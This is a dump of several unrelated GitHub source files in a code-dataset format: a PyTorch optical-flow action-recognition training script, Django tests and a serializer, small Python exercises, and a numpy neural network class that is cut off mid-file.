frames_index[filename]:\r\n if i >= seg[0] and i <= seg[1]:\r\n ok = True\r\n break\r\n if not ok:\r\n continue\r\n\r\n # Convert to grayscale.\r\n frame = Image.fromarray(np.array(frame))\r\n frame = frame.convert(\"L\")\r\n frame = np.array(frame.getdata(),dtype=np.uint8).reshape((120, 160))\r\n frame = resize(frame,(60, 80))\r\n\r\n if prev_frame is not None:\r\n # Calculate optical flow.\r\n flows = cv2.calcOpticalFlowFarneback(prev_frame, frame,**farneback_params)\r\n subsampled_x = np.zeros((30, 40), dtype=np.float32)\r\n subsampled_y = np.zeros((30, 40), dtype=np.float32)\r\n\r\n for r in range(30):\r\n for c in range(40):\r\n subsampled_x[r, c] = flows[r*2, c*2, 0]\r\n subsampled_y[r, c] = flows[r*2, c*2, 1]\r\n\r\n flow_x.append(subsampled_x)\r\n flow_y.append(subsampled_y)\r\n\r\n prev_frame = frame\r\n \r\n data.append({\r\n \"filename\": filename,\r\n \"category\": category,\r\n \"flow_x\": flow_x,\r\n \"flow_y\": flow_y \r\n })\r\n\r\n pickle.dump(data, open(\"data/%s_flow.p\" % dataset, \"wb\"))\r\n\r\ndef parsing_sequence_file():\r\n print(\"Parsing ../dataset/00sequences.txt\")\r\n 
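# 00sequences.txt lists, for every video, the frame ranges that actually\r\n    # contain the actor (e.g. person01_boxing_d1: 1-95, 96-185, ...); only\r\n    # frames inside those ranges are used by the dataset builders above.\r\n    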
#listing= os.listdir('sequences.txt')\r\n # Read 00sequences.txt file.\r\n \r\n with open('../dataset/sequence.txt', 'r') as content_file:\r\n content = content_file.read()\r\n\r\n # Replace tab and newline character with space, then split file's content\r\n # into strings.\r\n content = re.sub(\"[\\t\\n]\", \" \", content).split()\r\n\r\n # Dictionary to keep ranges of frames with humans.\r\n # Example:\r\n # video \"person01_boxing_d1\": [(1, 95), (96, 185), (186, 245), (246, 360)].\r\n frames_index = {}\r\n\r\n # Current video that we are parsing.\r\n current_filename = \"\"\r\n\r\n for s in content:\r\n if s == \"frames\":\r\n # Ignore this token.\r\n continue\r\n elif s.find(\"-\") >= 0:\r\n # This is the token we are looking for. e.g. 1-95.\r\n if s[len(s) - 1] == ',':\r\n # Remove comma.\r\n s = s[:-1]\r\n\r\n # Split into 2 numbers => [1, 95]\r\n idx = s.split(\"-\")\r\n\r\n # Add to dictionary.\r\n if not current_filename in frames_index:\r\n frames_index[current_filename] = []\r\n frames_index[current_filename].append((int(idx[0]), int(idx[1])))\r\n else:\r\n # Parse next file.\r\n current_filename = s + \"_uncomp.avi\"\r\n\r\n return frames_index\r\n\r\nCATEGORY_INDEX = {\r\n \"boxing\": 0,\r\n \"handclapping\": 1,\r\n \"handwaving\": 2,\r\n \"jogging\": 3,\r\n \"running\": 4,\r\n \"walking\": 5\r\n}\r\n\r\nclass opticalflowdataset(Dataset):\r\n def __init__(self, directory, dataset=\"train\", mean=None):\r\n self.instances, self.labels = self.read_dataset(directory, dataset)\r\n\r\n for i in range(len(self.instances)):\r\n self.instances[i][\"frames\"] = torch.from_numpy(\r\n self.instances[i][\"frames\"])\r\n self.instances[i][\"flow_x\"] = torch.from_numpy(\r\n self.instances[i][\"flow_x\"])\r\n self.instances[i][\"flow_y\"] = torch.from_numpy(\r\n self.instances[i][\"flow_y\"])\r\n\r\n self.labels = torch.from_numpy(self.labels)\r\n\r\n def __len__(self):\r\n return len(self.instances)\r\n\r\n def __getitem__(self, idx):\r\n sample = { \r\n \"instance\": self.instances[idx], \r\n \"label\": self.labels[idx] \r\n }\r\n\r\n return sample\r\n\r\n def zero_center(self, mean):\r\n for i in range(len(self.instances)):\r\n self.instances[i][\"frames\"] -= float(mean[\"frames\"])\r\n self.instances[i][\"flow_x\"] -= float(mean[\"flow_x\"])\r\n self.instances[i][\"flow_y\"] -= float(mean[\"flow_y\"])\r\n\r\n def read_dataset(self, directory, dataset=\"train\", mean=None):\r\n if dataset == \"train\":\r\n frame_path = os.path.join(directory, \"train.p\")\r\n flow_path = os.path.join(directory, \"train_flow.p\")\r\n elif dataset == \"test\":\r\n frame_path = os.path.join(directory, \"test.p\")\r\n flow_path = os.path.join(directory, \"test_flow.p\")\r\n else:\r\n frame_path = os.path.join(directory, \"validation.p\")\r\n flow_path = os.path.join(directory, \"validation_flow.p\")\r\n\r\n video_frames = pickle.load(open(frame_path, \"rb\"))\r\n video_flows = pickle.load(open(flow_path, \"rb\"))\r\n\r\n instances = []\r\n labels = []\r\n\r\n mean_frames = 0\r\n mean_flow_x = 0\r\n mean_flow_y = 0\r\n\r\n for i_video in range(len(video_frames)):\r\n current_block_frame = []\r\n current_block_flow_x = []\r\n current_block_flow_y = []\r\n\r\n frames = video_frames[i_video][\"frames\"]\r\n flow_x = [0] + video_flows[i_video][\"flow_x\"]\r\n flow_y = [0] + video_flows[i_video][\"flow_y\"]\r\n\r\n for i_frame in range(len(frames)):\r\n current_block_frame.append(frames[i_frame])\r\n\r\n if i_frame % 15 > 0:\r\n current_block_flow_x.append(flow_x[i_frame])\r\n 
current_block_flow_y.append(flow_y[i_frame])\r\n\r\n if (i_frame + 1) % 15 == 0:\r\n current_block_frame = np.array(\r\n current_block_frame,\r\n dtype=np.float32).reshape((1, 15, 60, 80))\r\n current_block_flow_x = np.array(\r\n current_block_flow_x,\r\n dtype=np.float32).reshape((1, 14, 30, 40))\r\n current_block_flow_y = np.array(\r\n current_block_flow_y,\r\n dtype=np.float32).reshape((1, 14, 30, 40))\r\n\r\n mean_frames += np.mean(current_block_frame)\r\n mean_flow_x += np.mean(current_block_flow_x)\r\n mean_flow_y += np.mean(current_block_flow_y)\r\n\r\n instances.append({\r\n \"frames\": current_block_frame,\r\n \"flow_x\": current_block_flow_x,\r\n \"flow_y\": current_block_flow_y\r\n })\r\n\r\n labels.append(\r\n CATEGORY_INDEX[video_frames[i_video][\"category\"]])\r\n\r\n current_block_frame = []\r\n current_block_flow_x = []\r\n current_block_flow_y = []\r\n\r\n mean_frames /= len(instances)\r\n mean_flow_x /= len(instances)\r\n mean_flow_y /= len(instances)\r\n\r\n self.mean = {\r\n \"frames\": mean_frames,\r\n \"flow_x\": mean_flow_x,\r\n \"flow_y\": mean_flow_y\r\n }\r\n\r\n labels = np.array(labels, dtype=np.uint8)\r\n\r\n return instances, labels\r\n\r\nclass CNNOpticalFlow(nn.Module):\r\n def __init__(self):\r\n super(CNNOpticalFlow, self).__init__()\r\n\r\n self.conv1_frame = nn.Sequential(\r\n nn.Conv3d(1, 16, kernel_size=(4, 5, 5)),\r\n nn.BatchNorm3d(16),\r\n nn.ReLU(),\r\n nn.MaxPool3d(kernel_size=(1, 2, 2)),\r\n nn.Dropout(0.5))\r\n self.conv2_frame = nn.Sequential(\r\n nn.Conv3d(16, 32, kernel_size=(4, 3, 3)),\r\n nn.BatchNorm3d(32),\r\n nn.ReLU(),\r\n nn.MaxPool3d(kernel_size=(2, 2, 2)),\r\n nn.Dropout(0.5))\r\n self.conv3_frame = nn.Sequential(\r\n nn.Conv3d(32, 64, kernel_size=(3, 3, 3)),\r\n nn.BatchNorm3d(64),\r\n nn.ReLU(),\r\n nn.MaxPool3d(kernel_size=(2, 2, 2)),\r\n nn.Dropout(0.5))\r\n\r\n self.conv1_flow_x = nn.Sequential(\r\n nn.Conv3d(1, 16, kernel_size=(3, 3, 3)),\r\n nn.BatchNorm3d(16),\r\n nn.ReLU(),\r\n nn.MaxPool3d(kernel_size=(1, 2, 2)),\r\n nn.Dropout(0.5))\r\n self.conv2_flow_x = nn.Sequential(\r\n nn.Conv3d(16, 32, kernel_size=(3, 3, 3)),\r\n nn.BatchNorm3d(32),\r\n nn.ReLU(),\r\n nn.MaxPool3d(kernel_size=(2, 2, 2)),\r\n nn.Dropout(0.5))\r\n self.conv3_flow_x = nn.Sequential(\r\n nn.Conv3d(32, 64, kernel_size=(3, 3, 3)),\r\n nn.BatchNorm3d(64),\r\n nn.ReLU(),\r\n nn.MaxPool3d(kernel_size=(2, 2, 2)),\r\n nn.Dropout(0.5))\r\n\r\n self.conv1_flow_y = nn.Sequential(\r\n nn.Conv3d(1, 16, kernel_size=(3, 3, 3)),\r\n nn.BatchNorm3d(16),\r\n nn.ReLU(),\r\n nn.MaxPool3d(kernel_size=(1, 2, 2)),\r\n nn.Dropout(0.5))\r\n self.conv2_flow_y = nn.Sequential(\r\n nn.Conv3d(16, 32, kernel_size=(3, 3, 3)),\r\n nn.BatchNorm3d(32),\r\n nn.ReLU(),\r\n nn.MaxPool3d(kernel_size=(2, 2, 2)),\r\n nn.Dropout(0.5))\r\n self.conv3_flow_y = nn.Sequential(\r\n nn.Conv3d(32, 64, kernel_size=(3, 3, 3)),\r\n nn.BatchNorm3d(64),\r\n nn.ReLU(),\r\n nn.MaxPool3d(kernel_size=(2, 2, 2)),\r\n nn.Dropout(0.5))\r\n\r\n self.fc1 = nn.Linear(3328, 128)\r\n self.dropfc1 = nn.Dropout(0.5)\r\n self.fc2 = nn.Linear(128, 6)\r\n\r\n def forward(self, frames, flow_x, flow_y):\r\n out_frames = self.conv1_frame(frames)\r\n out_frames = self.conv2_frame(out_frames)\r\n out_frames = self.conv3_frame(out_frames)\r\n out_frames = out_frames.view(out_frames.size(0), -1)\r\n\r\n out_flow_x = self.conv1_flow_x(flow_x)\r\n out_flow_x = self.conv2_flow_x(out_flow_x)\r\n out_flow_x = self.conv3_flow_x(out_flow_x)\r\n out_flow_x = out_flow_x.view(out_flow_x.size(0), -1)\r\n\r\n out_flow_y = 
self.conv1_flow_y(flow_y)\r\n out_flow_y = self.conv2_flow_y(out_flow_y)\r\n out_flow_y = self.conv3_flow_y(out_flow_y)\r\n out_flow_y = out_flow_y.view(out_flow_y.size(0), -1)\r\n\r\n out = torch.cat([out_frames, out_flow_x, out_flow_y], 1)\r\n out = self.fc1(out)\r\n out = nn.ReLU()(out)\r\n out = self.dropfc1(out)\r\n out = self.fc2(out)\r\n\r\n return out\r\n\r\ndef get_outputs(model, instances, flow=False, use_cuda=False):\r\n\r\n if flow:\r\n frames = Variable(instances[\"frames\"])\r\n flow_x = Variable(instances[\"flow_x\"])\r\n flow_y = Variable(instances[\"flow_y\"])\r\n\r\n if use_cuda:\r\n frames = frames.cuda()\r\n flow_x = flow_x.cuda()\r\n flow_y = flow_y.cuda()\r\n\r\n outputs = model(frames, flow_x, flow_y)\r\n\r\n else:\r\n instances = Variable(instances)\r\n if use_cuda:\r\n instances = instances.cuda()\r\n\r\n outputs = model(instances)\r\n\r\n return outputs\r\n\r\ndef evaluate(model, dataloader, flow=False, use_cuda=False):\r\n loss = 0\r\n correct = 0\r\n total = 0\r\n\r\n # Switch to evaluation mode.\r\n model.eval()\r\n\r\n for i, samples in enumerate(dataloader):\r\n outputs = get_outputs(model, samples[\"instance\"], flow=flow,\r\n use_cuda=use_cuda)\r\n \r\n labels = Variable(samples[\"label\"])\r\n if use_cuda:\r\n labels = labels.cuda()\r\n\r\n loss += nn.CrossEntropyLoss(size_average=False)(outputs, labels).data\r\n\r\n score, predicted = torch.max(outputs, 1)\r\n correct += (labels.data == predicted.data).sum()\r\n \r\n total += labels.size(0)\r\n\r\n acc = correct / total\r\n loss /= total\r\n\r\n return loss, acc\r\n\r\ndef train(model, num_epochs, train_set, test_set, lr=1e-3, batch_size=32,\r\n start_epoch=1, log=10, checkpoint_path=None, validate=True,\r\n resume=False, flow=False, use_cuda=False):\r\n\r\n train_loader = torch.utils.data.DataLoader(\r\n dataset=train_set, batch_size=batch_size, shuffle=True)\r\n\r\n # Must be sequential b/c this is used for evaluation.\r\n train_loader_sequential = torch.utils.data.DataLoader(\r\n dataset=train_set, batch_size=batch_size, shuffle=False)\r\n test_loader = torch.utils.data.DataLoader(\r\n dataset=test_set, batch_size=batch_size, shuffle=False)\r\n\r\n # Use Adam optimizer.\r\n optimizer = torch.optim.Adam(model.parameters(), lr=lr)\r\n train_accuracy = []\r\n test_accuracy = []\r\n # Record loss + accuracy.\r\n hist = []\r\n\r\n # Check if we are resuming training from a previous checkpoint.\r\n if resume:\r\n checkpoint = torch.load(os.path.join(\r\n checkpoint_path, \"model_epoch%d.chkpt\" % (start_epoch - 1)))\r\n\r\n model.load_state_dict(checkpoint[\"model\"])\r\n optimizer.load_state_dict(checkpoint[\"optimizer\"])\r\n\r\n hist = checkpoint[\"hist\"]\r\n\r\n if use_cuda:\r\n model.cuda()\r\n criterion = nn.CrossEntropyLoss().cuda()\r\n else:\r\n criterion = nn.CrossEntropyLoss()\r\n\r\n for epoch in range(start_epoch, start_epoch + num_epochs):\r\n # Switch to train mode.\r\n model.train()\r\n\r\n for i, samples in enumerate(train_loader):\r\n\r\n labels = Variable(samples[\"label\"])\r\n if use_cuda:\r\n labels = labels.cuda()\r\n\r\n # Zero out gradient from previous iteration.\r\n optimizer.zero_grad()\r\n\r\n # Forward, backward, and optimize.\r\n outputs = get_outputs(model, samples[\"instance\"], flow=flow,\r\n use_cuda=use_cuda)\r\n loss = criterion(outputs, labels)\r\n loss.backward()\r\n optimizer.step()\r\n\r\n if (i+1) % log == 0:\r\n print(\"epoch %d/%d, iteration %d/%d, loss: %s\"\r\n % (epoch, start_epoch + num_epochs - 1, i + 1,\r\n len(train_set) // batch_size, loss.data))\r\n \r\n # 
Get overall loss & accuracy on training set.\r\n        train_loss, train_acc = evaluate(model, train_loader_sequential,\r\n                                         flow=flow, use_cuda=use_cuda)\r\n\r\n        if validate:\r\n            # Get overall loss & accuracy on test set.\r\n            test_loss, test_acc = evaluate(model, test_loader, flow=flow,\r\n                                           use_cuda=use_cuda)\r\n\r\n            print(\"epoch %d/%d, train_loss = %s, train_acc = %s, \"\r\n                  \"test_loss = %s, test_acc = %s\"\r\n                  % (epoch, start_epoch + num_epochs - 1,\r\n                     train_loss, train_acc, test_loss, test_acc))\r\n            train_accuracy.append(train_acc)\r\n            test_accuracy.append(test_acc)\r\n            hist.append({\r\n                \"train_loss\": train_loss, \"train_acc\": train_acc,\r\n                \"test_loss\": test_loss, \"test_acc\": test_acc\r\n            })\r\n        else:\r\n            print(\"epoch %d/%d, train_loss = %s, train_acc = %s\" % (epoch,\r\n                start_epoch + num_epochs - 1, train_loss, train_acc))\r\n            train_accuracy.append(train_acc)\r\n            hist.append({\r\n                \"train_loss\": train_loss, \"train_acc\": train_acc\r\n            })\r\n\r\n        optimizer.zero_grad()\r\n        checkpoint = {\r\n            \"model\": model.state_dict(),\r\n            \"optimizer\": optimizer.state_dict(),\r\n            \"hist\": hist\r\n        }\r\n\r\n        # Save checkpoint.\r\n        torch.save(checkpoint, os.path.join(\r\n            checkpoint_path, \"model_epoch%d.chkpt\" % epoch)) \r\n    \r\n    return train_accuracy,test_accuracy\r\nif __name__ == \"__main__\":\r\n    # creating the datasets\r\n    print(\"Making optical flow features for train dataset\")\r\n    optflow_dataset(dataset=\"train\")\r\n    print(\"Making raw_dataset features for train dataset\")\r\n    raw_dataset(dataset=\"train\")\r\n    print(\"Making optical flow features for test dataset\")\r\n    optflow_dataset(dataset=\"test\")\r\n    print(\"Making raw_dataset features for test dataset\")\r\n    raw_dataset(dataset=\"test\")\r\n    print(\"Making optical flow features for validation dataset\")\r\n    optflow_dataset(dataset=\"validation\")\r\n    print(\"Making raw_dataset features for validation dataset\")\r\n    raw_dataset(dataset=\"validation\")\r\n    # parsing the path and the location from the inputs given to the file\r\n    parser = argparse.ArgumentParser(description=\"Block Frame&Flow ConvNet\")\r\n    parser.add_argument(\"--dataset_dir\", type=str, default=\"data\",\r\n                        help=\"directory to dataset\")\r\n    parser.add_argument(\"--batch_size\", type=int, default=64,\r\n                        help=\"batch size for training (default: 64)\")\r\n    parser.add_argument(\"--num_epochs\", type=int, default=3,\r\n                        help=\"number of epochs to train (default: 3)\")\r\n    parser.add_argument(\"--start_epoch\", type=int, default=1,\r\n                        help=\"start index of epoch (default: 1)\")\r\n    parser.add_argument(\"--lr\", type=float, default=0.001,\r\n                        help=\"learning rate for training (default: 0.001)\")\r\n    parser.add_argument(\"--log\", type=int, default=10,\r\n                        help=\"log frequency (default: 10 iterations)\")\r\n    parser.add_argument(\"--cuda\", type=int, default=0,\r\n                        help=\"whether to use cuda (default: 0)\")\r\n    args = parser.parse_args()\r\n    # if passing the arguments via console change the hardcoded values to args.{variablename}\r\n    dataset_dir = args.dataset_dir\r\n    batch_size = 64\r\n    num_epochs = 50\r\n    start_epoch = 1\r\n    lr = args.lr\r\n    log_interval = args.log\r\n\r\n    if args.cuda == 1:\r\n        cuda = True\r\n    else:\r\n        cuda = False\r\n\r\n    print(\"Loading dataset\")\r\n    train_set = opticalflowdataset(dataset_dir, \"train\")\r\n    test_set = opticalflowdataset(dataset_dir, \"test\")\r\n    train_set.zero_center(train_set.mean)\r\n    test_set.zero_center(train_set.mean)\r\n    \r\n    # Create model and optimizer.\r\n    model = 
CNNOpticalFlow()\r\n\r\n    if start_epoch > 1:\r\n        resume = True\r\n    else:\r\n        resume = False\r\n\r\n    # Create directory for storing checkpoints.\r\n    os.makedirs(os.path.join(dataset_dir, \"cnn_optical_flow_model_chckpts\"),\r\n                exist_ok=True)\r\n\r\n    print(\"Start training\")\r\n    history,test_accuracy_val = train(model, num_epochs, train_set, test_set, lr=lr, batch_size=batch_size,\r\n          start_epoch=start_epoch, log=log_interval, \r\n          checkpoint_path=os.path.join(dataset_dir, \"cnn_optical_flow_model_chckpts\"),\r\n          validate=True, resume=resume, flow=True, use_cuda=cuda)\r\n    print(history)\r\n    print(test_accuracy_val)\r\n    \r\n    # plotting the training and the test curve\r\n    epochs = range(1,num_epochs + 1)\r\n    plt.plot(epochs, history, 'g')\r\n    plt.title('Training accuracy vs epoch')\r\n    plt.xlabel('Epochs')\r\n    plt.ylabel('accuracy')\r\n    plt.show()\r\n    epochs = range(1,num_epochs + 1)\r\n    plt.plot(epochs, test_accuracy_val, 'r')\r\n    plt.title('Test accuracy vs epoch')\r\n    plt.xlabel('Epochs')\r\n    plt.ylabel('accuracy')\r\n    \r\n    # evaluation\r\n    dataset_dir = args.dataset_dir\r\n    \r\n    # update the model name to evaluate the data on the trained model\r\n    model_dir = \"data/cnn_optical_flow_model_chckpts/model_epoch40.chkpt\"\r\n\r\n    print(\"Loading validation dataset\")\r\n    train_dataset = opticalflowdataset(dataset_dir, \"validation\")\r\n    video_frames = pickle.load(open(\"data/validation.p\", \"rb\"))\r\n    video_flows = pickle.load(open(\"data/validation_flow.p\", \"rb\"))\r\n\r\n    print(\"Loading the trained model\")\r\n    chkpt = torch.load(model_dir, map_location=lambda storage, loc: storage)\r\n    model = CNNOpticalFlow()\r\n    model.load_state_dict(chkpt[\"model\"])\r\n\r\n    # Number of correctly classified videos.\r\n    correct = 0\r\n\r\n    model.eval()\r\n    for i in range(len(video_frames)):\r\n        frames = video_frames[i][\"frames\"]\r\n        flow_x = [0] + video_flows[i][\"flow_x\"]\r\n        flow_y = [0] + video_flows[i][\"flow_y\"]\r\n\r\n        # Class probabilities.\r\n        P = np.zeros(6, dtype=np.float32)\r\n\r\n        current_block_frame = []\r\n        current_block_flow_x = []\r\n        current_block_flow_y = []\r\n        cnt = 0\r\n\r\n        for i_frame in range(len(frames)):\r\n            current_block_frame.append(frames[i_frame])\r\n\r\n            if i_frame % 15 > 0:\r\n                current_block_flow_x.append(flow_x[i_frame])\r\n                current_block_flow_y.append(flow_y[i_frame])\r\n\r\n            if (i_frame + 1) % 15 == 0:\r\n                cnt += 1\r\n\r\n                current_block_frame = np.array(\r\n                    current_block_frame,\r\n                    dtype=np.float32).reshape((1, 15, 60, 80))\r\n\r\n                current_block_flow_x = np.array(\r\n                    current_block_flow_x,\r\n                    dtype=np.float32).reshape((1, 14, 30, 40))\r\n\r\n                current_block_flow_y = np.array(\r\n                    current_block_flow_y,\r\n                    dtype=np.float32).reshape((1, 14, 30, 40))\r\n\r\n                current_block_frame -= train_dataset.mean[\"frames\"]\r\n                current_block_flow_x -= train_dataset.mean[\"flow_x\"]\r\n                current_block_flow_y -= train_dataset.mean[\"flow_y\"]\r\n\r\n                tensor_frames = torch.from_numpy(current_block_frame)\r\n                tensor_flow_x = torch.from_numpy(current_block_flow_x)\r\n                tensor_flow_y = torch.from_numpy(current_block_flow_y)\r\n\r\n                instance_frames = Variable(tensor_frames.unsqueeze(0))\r\n                instance_flow_x = Variable(tensor_flow_x.unsqueeze(0))\r\n                instance_flow_y = Variable(tensor_flow_y.unsqueeze(0))\r\n\r\n                score = model(instance_frames, instance_flow_x,\r\n                              instance_flow_y).data[0].numpy()\r\n\r\n                score -= np.max(score)\r\n                p = np.e**score / np.sum(np.e**score)\r\n                P += p\r\n\r\n                current_block_frame = []\r\n                current_block_flow_x = []\r\n                current_block_flow_y = []\r\n\r\n        P /= 
cnt\r\n pred = CATEGORIES[np.argmax(P)]\r\n if pred == video_frames[i][\"category\"]:\r\n correct += 1\r\n\r\n if i > 0 and i % 10 == 0:\r\n print(\"Done %d/%d videos\" % (i, len(video_frames)))\r\n\r\n print(\"%d/%d correct\" % (correct, len(video_frames)))\r\n print(\"Accuracy: %.9f\" % (correct / len(video_frames)))\r\n\r\n","repo_name":"nb20593/Action-Recogonition","sub_path":"main/Action_Recognition.py","file_name":"Action_Recognition.py","file_ext":"py","file_size_in_byte":26360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43718578524","text":"from django.test import TestCase, Client\nfrom django.urls import reverse\nimport json\n\nfrom app.views import (\n most_repeated_letter,\n save_text_data_into_database\n)\nfrom webservice.views import (\n random_line\n)\nfrom app.models import TextModel\n\nclass TestView(TestCase):\n \n def setUp(self):\n self.client = Client()\n self.list_text_line_url = reverse(\"list_text_line\")\n self.filename = \"textfile_directory/my_text.txt\"\n self.text_data = {\n \"line_text\": \"The entire reading component must be written in English\", \n }\n self.created_text_line = TextModel.objects.create(\n text_line=\"This is a random text for tests purposes.\",\n most_frequency_character=\"o\",\n )\n \n # def test_counting_letters(self):\n # text = \"This is a random text for tests purposes.\"\n # counted_letters = counting_letters(text)\n # self.assertIsInstance(counted_letters, dict)\n\n def test_save_text_into_database_success(self):\n text_data_info = save_text_data_into_database(self.text_data)\n self.assertIsInstance(text_data_info, TextModel)\n\n def test_add_another_line(self):\n response = self.client.get(\n reverse(\"add_another_line\"),\n data={\n \"line\": \"Random text line\",\n \"most_frequency_character\": \"t\",\n },\n content_type='application/json',\n HTTP_X_REQUESTED_WITH='XMLHttpRequest'\n )\n \n self.assertEquals(response.status_code, 200)\n self.assertTrue(response, \"application/json\")\n\n def test_list_text_line_list_GET(self):\n response = self.client.get(self.list_text_line_url)\n self.assertEquals(response.status_code, 200)\n self.assertTemplateUsed(response, \"app/index.html\")\n","repo_name":"giovannamascarenhas/cocus-challenge","sub_path":"app/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"8547829211","text":"from home.models import WelcomeCard\nfrom rest_framework import serializers\n\n\nclass WelcomeCardSerializer(serializers.ModelSerializer):\n class Meta:\n model = WelcomeCard\n fields = [\n \"title\",\n \"description\",\n \"tag_txt\",\n \"created_at\",\n \"updated_at\",\n \"button_src\",\n \"button_txt\",\n \"image\",\n \"design_type\",\n \"category\",\n \"col\",\n \"status\",\n ]\n","repo_name":"prography/snowflake-backend","sub_path":"home/serializers/welcome_card.py","file_name":"welcome_card.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"13057832191","text":"\nword = 'Архангельск'\nprint(word[-1])\n\nnew_word = word.lower()\ncount = 0\nfor i in new_word:\n if i == 'а':\n count += 1\nprint(count)\n\n\nword = \"Архангельск\"\nvocab = [\"а\", \"е\", \"и\", \"о\", \"у\", \"э\", \"ю\", \"я\", \"ы\"]\ncount = 0\nfor i in word.lower():\n for j in vocab:\n if i == j:\n count += 
1\nprint(count)\n\n\nsentence = 'Мы приехали в гости'\nprint(len(sentence.split()))\n\nfor i in sentence.split():\n print(i[0])\n\n\nnew_sentence = sentence.replace(' ','')\nprint(int(len(new_sentence)/len(sentence.split())))\n","repo_name":"demidenko-svetlana/lesson2","sub_path":"practice9.py","file_name":"practice9.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13442937878","text":"def init():\n N, M, K = map(int, input().split())\n\n fireball_list = []\n for _ in range(M):\n temp = list(map(int, input().split()))\n fireball_list.append(temp)\n\n return N, M, K, fireball_list\n \n\nN, M, K, fireball_list = init()\ngrid = [[[] for _ in range(N)] for _ in range(N)]\n\ndr = [-1, -1, 0, 1, 1, 1, 0, -1]\ndc = [0, 1, 1, 1, 0, -1, -1, -1]\n\nfor _ in range(K):\n while fireball_list:\n r, c, m, s, d = fireball_list.pop(0)\n new_r = (r + s * dr[d]) % N\n new_c = (c + s * dc[d]) % N\n grid[new_r][new_c].append([m, s, d])\n\n for r in range(N):\n for c in range(N):\n if len(grid[r][c]) > 1:\n sum_m, sum_s, odd_cnt, even_cnt, cnt = 0, 0, 0, 0, len(grid[r][c])\n \n while grid[r][c]:\n m, s, d = grid[r][c].pop(0)\n sum_m += m\n sum_s += s\n\n if d % 2 == 0:\n even_cnt += 1\n else:\n odd_cnt += 1\n\n if odd_cnt == cnt or even_cnt == cnt:\n direction = [0, 2, 4, 6]\n else:\n direction = [1, 3, 5, 7]\n \n if sum_m // 5:\n for d in direction:\n fireball_list.append([r, c, sum_m//5, sum_s//cnt, d])\n \n if len(grid[r][c]) == 1:\n fireball_list.append([r, c] + grid[r][c].pop(0))\n\nprint(sum(ball[2] for ball in fireball_list))","repo_name":"dhleekr/algorithm","sub_path":"ss/20056.py","file_name":"20056.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34610859920","text":"import math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\np=0\r\nm=0\r\nn=0\r\na=int(input())\r\nx = list(map(int,input().strip().split()))[:a] \r\nfor i in range(0,a):\r\n if x[i]>0:\r\n p=p+1\r\n elif x[i]==0:\r\n n=n+1\r\n else:\r\n m=m+1\r\nprint(p/a)\r\nprint(m/a)\r\nprint(n/a)\r\n","repo_name":"triquetrx/HackerRank","sub_path":"check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71080707752","text":"# longest substring without repeating characters\r\n# input asddfghjill\r\n# output dfghjil\r\n# input fedoret\r\n# output fedor\r\ndef find_longest_substring(inputstring) :\r\n if inputstring is None :\r\n return \"\"\r\n startindex=0\r\n movingindex=0\r\n longestsubstring=\"\"\r\n stringset=[]\r\n for i in range(0,len(inputstring)):\r\n movingindex+=1\r\n \r\n if inputstring[i] not in stringset :\r\n stringset.append(inputstring[i])\r\n if(len(stringset)>len(longestsubstring)):\r\n longestsubstring=inputstring[startindex:movingindex]\r\n continue\r\n while startindex 0 else [0,1,0] if result == 0 else [0,0,1] for result in results])\n\n return (X, y)\n\n def loadData(self, trainData, testData):\n self.Xtrain, self.ytrain = self.prepareData(trainData)\n self.Xtest, self.ytest = self.prepareData(testData)\n np.random.seed(1)\n # Randomly initializing weights\n self.w1 = 2 * np.random.random((10, 29)) - 1\n self.w2 = 2 * np.random.random((10, 10)) - 1\n self.w3 = 2 * np.random.random((3, 10)) - 1\n\n def fit(self, k=10, type='nonlinear',iterations=1000):\n # Iterating over training 
samples\n        print(\"Training...\")\n        for i in tqdm(range(iterations)): # progress bar\n            for X, y in zip(self.Xtrain, self.ytrain):\n                # Feedforward\n                a1, a2, a3, a4 = self.feedforward(X,type)\n                \n                # Backpropagation\n                d2, d3, d4 = self.backpropagation(a2, a3, a4, y)\n\n                # Outer-product weight updates; nan_to_num guards against overflow when k is even\n                if k%2==0:\n                    self.w1 += np.nan_to_num(np.transpose(np.dot(np.transpose(np.asmatrix(a1)), np.asmatrix(d2))))\n                    self.w2 += np.nan_to_num(np.transpose(np.dot(np.transpose(np.asmatrix(a2)), np.asmatrix(d3))))\n                    self.w3 += np.nan_to_num(np.transpose(np.dot(np.transpose(np.asmatrix(a3)), np.asmatrix(d4))))\n                else: \n                    self.w1 += np.transpose(np.dot(np.transpose(np.asmatrix(a1)), np.asmatrix(d2)))\n                    self.w2 += np.transpose(np.dot(np.transpose(np.asmatrix(a2)), np.asmatrix(d3)))\n                    self.w3 += np.transpose(np.dot(np.transpose(np.asmatrix(a3)), np.asmatrix(d4)))\n        print(\"\\nTraining complete!\\n\")\n    \n    # Feedforward to find a2, a3, a4\n    def feedforward(self, X, type='nonlinear'):\n        #activation f(x) = sigmoid(x)\n        if type == 'nonlinear':\n            a1 = X\n            z2 = np.dot(self.w1, a1)\n            a2 = self.sigmoid(z2)\n            z3 = np.dot(self.w2, a2)\n            a3 = self.sigmoid(z3)\n            z4 = np.dot(self.w3, a3)\n            a4 = self.sigmoid(z4)\n        elif type == 'linear': #activation f(x) = Wx+b\n            a1 = X\n            a2 = np.dot(self.w1, a1)\n            a3 = np.dot(self.w2, a2)\n            a4 = np.dot(self.w3, a3)\n\n        (a1,a2,a3,a4) = (np.nan_to_num(a1), np.nan_to_num(a2), np.nan_to_num(a3), np.nan_to_num(a4))\n        return (a1, a2, a3, a4)\n\n    # Backpropagation to find d2, d3, d4\n    def backpropagation(self, a2, a3, a4, y):\n        d4 = np.subtract(a4, y)\n        i3 = np.ones(a3.shape)\n        i2 = np.ones(a2.shape)\n\n        # Sigmoid derivative g'(z) = a * (1 - a), applied elementwise\n        # 